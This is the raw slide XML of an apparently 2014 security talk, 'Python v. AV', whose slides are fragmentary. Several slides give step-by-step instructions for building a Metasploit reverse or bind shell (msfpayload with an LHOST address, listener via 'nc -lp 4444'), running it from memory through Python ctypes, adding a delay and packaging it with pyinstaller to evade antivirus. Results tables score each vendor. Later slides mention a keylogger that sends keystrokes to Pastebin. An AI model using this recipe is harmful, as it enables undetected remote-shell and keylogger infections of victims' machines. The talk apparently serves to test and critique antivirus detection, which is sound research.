              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3416657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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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3800"/>
            <a:ext cx="8229600" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile --noconsole foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1451391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VirusTotal: 1/50 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p8-av2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1" b="7039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777203" y="1417638"/>
            <a:ext cx="7741241" cy="5195114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1529121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Norton Support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 Tweeted about this, and @NortonSupport replied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@NortonSupport gave me a link for a 30-day trial version :)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364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Norton Wins!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4-05-23 at 5.01.0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44" y="1600200"/>
            <a:ext cx="6740774" cy="472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01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Kaspersky Wins!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Avast! doesn't detect it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky detects it as HEUR:Trojan.Win32.Generic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-23 at 4.46.3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777" y="3420343"/>
            <a:ext cx="5051777" cy="329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424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058333"/>
            <a:ext cx="7772400" cy="4191000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a delay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328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 descr="norton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111" y="373945"/>
            <a:ext cx="4064000" cy="622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173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norton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467" y="437445"/>
            <a:ext cx="4025900" cy="3048000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5" name="Picture 4" descr="norton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467" y="3616678"/>
            <a:ext cx="403860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575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 on Windows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Observing data on a magnetic hard disk after</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Moving to Recycle Bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Emptying Recycle Bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Formatting Drive (Quick)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formatting Drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Slow)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03828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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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000" y="1193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>cp foo foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano foo2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x=raw_input("Press Enter to continue")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile foo2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"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2484877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Norton, Avast, &amp; MSE Lose!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4-05-23 at 5.22.4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778" y="1600200"/>
            <a:ext cx="6335889" cy="497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180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Kaspersky Wins!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4-05-23 at 5.19.0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94" y="1600200"/>
            <a:ext cx="7103505" cy="478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955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058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in two stages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>no delay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943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AV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Tested on Mar 24, 2014 with a two-stage reverse shell and no time delay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Al these failed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nod32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avast!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>360 Internet Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>McAfee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kaspersky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5927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Remember Mikko?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F-secure's Mikko Hyppönen_ Full talk from Wired 2012_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4825" y="1600200"/>
            <a:ext cx="8135938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615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F-Secure Wins!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Fsec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667" y="1600200"/>
            <a:ext cx="6279444" cy="4989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098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AV Challenge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529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98333"/>
            <a:ext cx="8229600" cy="2527830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Posted April 3, 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No reply from AV vendors, but Norton improved its detection after that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now a delay is required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.34.1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71828"/>
            <a:ext cx="8229600" cy="779368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-24 at 7.34.2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8353778" cy="1647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733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058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with a delay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6530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Forensics &amp; Data Recovery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can recover deleted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find evidence of crimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even after a format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very few criminals know enough to use encryption or forensic erasure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09455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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSTRUCTIONS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000" y="1193800"/>
            <a:ext cx="8890000" cy="56642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On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msfpayload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>192.168.119.252 C &gt; rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x=raw_input("Press Enter to continue")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ctypes import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1523355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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INSTRUCTIONS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3800"/>
            <a:ext cx="8229600" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller --onefile rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nc –lp 4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"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3067995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Norton Loses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4-05-23 at 6.06.2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889" y="1600200"/>
            <a:ext cx="6505222" cy="4630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709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Kaspersky Wins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4-05-23 at 6.07.4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111" y="2005486"/>
            <a:ext cx="7366000" cy="40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654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Advanced Malware Protection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365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503333"/>
            <a:ext cx="8229600" cy="62283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ty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ChrisAbdalla_1 from HP ESP TippingPoint</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.23.32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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791633" y="273050"/>
            <a:ext cx="6997700" cy="2238728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9" name="Picture 8" descr="Screen Shot 2014-05-24 at 7.23.54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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="310445" y="2659239"/>
            <a:ext cx="8573911" cy="2667390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2498986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87222"/>
            <a:ext cx="8229600" cy="3938941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I've tried to contact them several times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HELP!   Would someone with FireEye please test these samples?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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977" y="201259"/>
            <a:ext cx="5116690" cy="148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30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Python Keylogger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033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2844800" cy="2223029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google "Python Keylogger"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36333"/>
            <a:ext cx="2844800" cy="3289830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I used this one from 4 years ago</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-24 at 7.41.2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999" y="599194"/>
            <a:ext cx="5475646" cy="5851525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1273816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 Keystrokes to Pastebin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p9-ch1a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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="846665" y="1725070"/>
            <a:ext cx="7605889" cy="464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749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Useful Free Data Recovery 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Recuva for PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disk Drill for Mac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2013-05-22 at 8.40.1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0" y="3390900"/>
            <a:ext cx="3835400" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="rc_previe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3390900"/>
            <a:ext cx="25400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676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Pastebin busted me for making too many pastes in a 24-hour period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So I wrote my own Pastebin imitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29153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Kaspersky &amp; Avast! LOSE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4-05-24 at 11.13.4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445" y="1715123"/>
            <a:ext cx="6152444" cy="4691321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3009891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8778"/>
            <a:ext cx="8229600" cy="931333"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Norton WINS!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Screen Shot 2014-05-24 at 11.28.4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555" y="1221171"/>
            <a:ext cx="6166556" cy="5411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50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just add a delay...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Screen Shot 2014-05-24 at 11.46.2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19" y="1304749"/>
            <a:ext cx="7613335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013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222"/>
            <a:ext cx="8229600" cy="959556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F-Secure LOSES!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4-05-24 at 12.02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0" y="1417638"/>
            <a:ext cx="6533444" cy="539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10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PRODUCT ANNOUNCEMENT!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100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8778"/>
            <a:ext cx="8229600" cy="917222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ultra-Advanced APT Tool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192889"/>
